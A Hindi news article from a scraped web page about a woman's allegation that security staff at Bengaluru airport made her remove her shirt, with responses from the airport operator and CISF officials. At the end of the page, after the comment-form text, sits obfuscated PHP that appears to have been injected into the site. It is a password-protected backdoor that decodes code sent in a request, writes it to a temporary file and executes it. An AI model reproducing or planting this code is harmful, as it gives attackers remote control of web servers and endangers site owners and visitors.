बेंगालुरू: महिला का आरोप,एयरपोर्ट पर सुरक्षा जांच के दौरान उतरवाए गए कपड़े

Uttarakhand Press News, 4 January 2023: बेंगालुरू: बेंगलुरु एयरपोर्ट पर सुरक्षा व्यवस्था को लेकर कृष्णानी गढ़वी नाम की महिला ने एक गंभीर आरोप लगाया है. गढ़वी ने एक ट्वीट में बताया है कि बेंगलुरु एयरपोर्ट पर सुरक्षा जांच के दौरान मुझसे शर्ट उतारने को कहा गया. सुरक्षा चौकी पर सिर्फ अंडर गार्मेंट्स पहनकर खड़ा रहना बहुत ही अपमानजनक है और इस जिस तरह लोग देख रहे थे वैसी अटेंशन तो कोई महिला नहीं चाहेगी. बेंगलुरु एयरपोर्ट आपको एक महिला को स्ट्रिप करने की क्या जरूरत पड़ गई.

एक युवती ने सोशल मीडिया पर आरोप लगाया कि बेंगलुरू हवाईअड्डे पर जांच कर रहे सुरक्षाकर्मियों द्वारा शर्ट उतारने को कहे जाने के बाद वह अपमानित महसूस कर रही थी. खुद को स्टूडेंट और परफॉर्मिंग म्यूजिशियन बताने वाली कृष्णानी गढ़वी ने मंगलवार शाम को ट्वीट किया कि बेंगलुरू एयरपोर्ट पर सुरक्षा जांच के दौरान मुझसे अपनी शर्ट उतारने को कहा गया. सुरक्षा चौकी पर सिर्फ केमीसोल पहनकर खड़ा होना और शर्ट उतारना वास्तव में अपमानजनक था. एक महिला के रूप में आप इस तरह का ध्यान कभी नहीं चाहेंगी. @BLRAirport आपको स्ट्रिप करने के लिए एक महिला की आवश्यकता क्यों होगी?

ट्वीट में एयरलाइन, उसके गंतव्य या उसकी यात्रा की तारीख के बारे में विवरण नहीं दिया गया था. सुरक्षा एजेंसियों ने कहा कि वे विवरण के लिए सीसीटीवी की जांच करेंगे और पूछा कि उन्होंने केंद्रीय औद्योगिक सुरक्षा बल (सीआईएसएफ) और न ही हवाई अड्डे के पुलिस स्टेशन में शिकायत दर्ज क्यों नहीं कराई. हवाई अड्डे के संचालक, बैंगलोर इंटरनेशनल एयरपोर्ट लिमिटेड ने ‘परेशानी’ के लिए खेद व्यक्त किया. हमने इसे अपनी ऑपरेशन टीम को हाइलाइट किया है और इसे सीआईएसएफ द्वारा प्रबंधित सुरक्षा टीम को भी बढ़ाया है, जो एक सरकारी संस्था है. उन्होंने उसे सीधे संदेश के माध्यम से अपना संपर्क विवरण भेजने के लिए भी कहा.

एक वकील, आर्यन आर्य ने अपने ट्वीट के माध्यम से जवाब दिया कि यह एक हवाई अड्डे और उसकी सुरक्षा टीम के लिए बहुत ही अनुचित है. सुरक्षा जरूरी है लेकिन इसका इस्तेमाल लोगों को अपमानित करने के लिए न करें. बीमार! इस बीच, एक शीर्ष सुरक्षा अधिकारी ने कहा कि हवाईअड्डे पर प्रतिदिन करीब एक लाख यात्रियों की जांच की जाती है. हवाईअड्डे का हर हिस्सा सीसीटीवी द्वारा कवर किया गया है. इसलिए यदि घटना हाल की है, तो हम इसे पुनः प्राप्त कर सकते हैं और फुटेज देख सकते हैं.

यह बिना किसी विवरण के केवल एक आरोप है. व्यक्ति दुनिया को अनुभव ट्वीट क्यों कर रहा है? सीआईएसएफ या पुलिस में शिकायत दर्ज कराने के बजाय? उन्होंने कहा कि यात्रियों को कुछ भी उतारने के लिए कहा जा सकता है, जो स्क्रीनिंग कर्मियों को लगता है कि सुरक्षा जांच में बाधा है. यह बेल्ट, जैकेट, कोट या जूते हो सकते हैं.

Read Previous

जम्मू और कश्मीर के सांबा में अंतरराष्ट्रीय सीमा पर लगाया गया रात का कर्फ्यू

Read Next

Uttarakhand: उत्तराखंड अधीनस्थ सेवा चयन आयोग ने पेपर लीक के आरोपी 400 अभ्यर्थियों को किया चिन्हित

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}